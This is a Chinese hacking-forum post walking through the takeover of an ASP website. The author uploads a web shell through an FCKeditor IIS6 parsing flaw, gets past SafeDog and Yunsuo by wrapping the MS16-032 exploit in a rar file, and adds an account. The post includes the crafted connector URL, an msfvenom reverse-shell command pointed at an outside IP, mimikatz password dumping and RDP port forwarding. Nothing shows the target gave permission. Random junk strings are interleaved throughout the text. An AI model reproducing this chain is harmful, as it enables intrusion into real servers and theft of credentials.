中国网络渗透测试联盟

标题: 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器 [打印本页]

作者: admin    时间: 2018-10-20 20:31
标题: 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

& C0 p" g$ w& o: [4 ^ a# c& p. R/ t8 z% [) p! a: ?& ^3 b, ^; l `% `2 S9 `+ c* r- |+ |+ K$ Z# r& ]# x" L, Z) n1 ^. @, j' `% w0 a+ t9 ~9 f8 G1 R8 x# {" X% K$ ^1 \0 u
! v1 U- l; Z/ _$ p4 y

+ K% m2 ?/ O2 T q0 f1 v
# Y3 f9 x+ R$ i9 U
一、 利用getwebshell
' [7 I. d, s% h/ P
! Z7 t3 y/ J* R. ~3 r! o3 h9 D7 ?
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
& {- c. b5 \/ Q) n( I8 [$ _5 _
1 B* o/ g s" ^& R2 S: p8 l222.png
5 K+ Q, s! ]2 t# j: c
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
2 E$ G- p2 [+ g& c1 L0 w 333.png
0 A+ `% K6 A( i/ H" [" ?
下面我们构造一个asp目录,如: 9 F c0 ?* u+ u% B7 v/ |

, u1 P8 P7 ?" g! B+ k# X% h: L/ p

, W2 N1 k# F7 s j# t. Q3 q http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 : g; l' a% Y6 l6 I5 B0 M5 F

% g: U! K4 j% o. b" @

! i# L* \) q7 L+ I8 e1 j" [8 C 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
1 C4 x6 I9 F, _+ ?! ?8 J2 o
% H% ~4 O+ Q2 U, N
一、 绕过安全狗云锁提权并且加账号
0 R2 S3 g/ K$ l0 _- i444.png
4 d, t K7 f" B( o* V- g6 s5 T1 I4 V
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
" i: C, h" A$ M; W' G0 O1 @
, ^+ k9 H& C7 ^- l
如图:
6 }9 D" N5 M s- `' o555.png
! |0 h% v+ d, G7 S
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
7 ^' B* S7 Q- U& ]; X* d. J8 z
$ V# R( S$ [4 `% e* u) } A! g: G
一、 利用metasploit
0 p0 j) W% B9 o. C
' J. F: o6 P% O% c4 \
首先用pentestbox生成一个64位的payload如下命令
$ B8 A9 F+ @' n0 Q- [- l A
" |, `% {: X) t2 l4 P* T* ? msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
* ~2 J; x J8 @3 T# L1 }& Y' p& y) R
1 v3 g" N4 k7 p
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
! a3 r( t* v8 A! g& @6 ^11.png
+ I8 u# M, g3 s. ?1 H. L# F
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
1 Q+ W9 @9 u+ ?6 {6 k5 q/ O 13.png
Q. k& A- C, o5 P+ l) {
下面我们来做一个监听如下命令:
Q# n& v4 S5 F+ A, |; D
' }2 O/ S% B8 A5 Z# i. s2 S7 s( nportfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
, [* F3 B# F, V# v3 \18.png
! {8 M. t/ A2 Z

8 C; X3 L; P# [& }1 o
4 ^) q. M! `4 _, K+ Z

7 }' F4 W. V ^9 \' a* A# w1 G

% T& k8 [) k) `( M7 J. _0 l6 [% s
3 n0 ]9 u; _+ p4 @
6 N% L6 C. `# \( ~2 ^$ n
# a# a( J g9 _: O* c$ i

& Y S& N$ M/ j) a: w% E
. l+ o' @& l2 D9 \$ P + D5 e* O: G' c6 B* I- Y/ j

" c+ E9 c1 j* J
. q3 L: L, ?" k


作者: 匿名    时间: 2021-11-20 23:30
图片怎么都没了




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2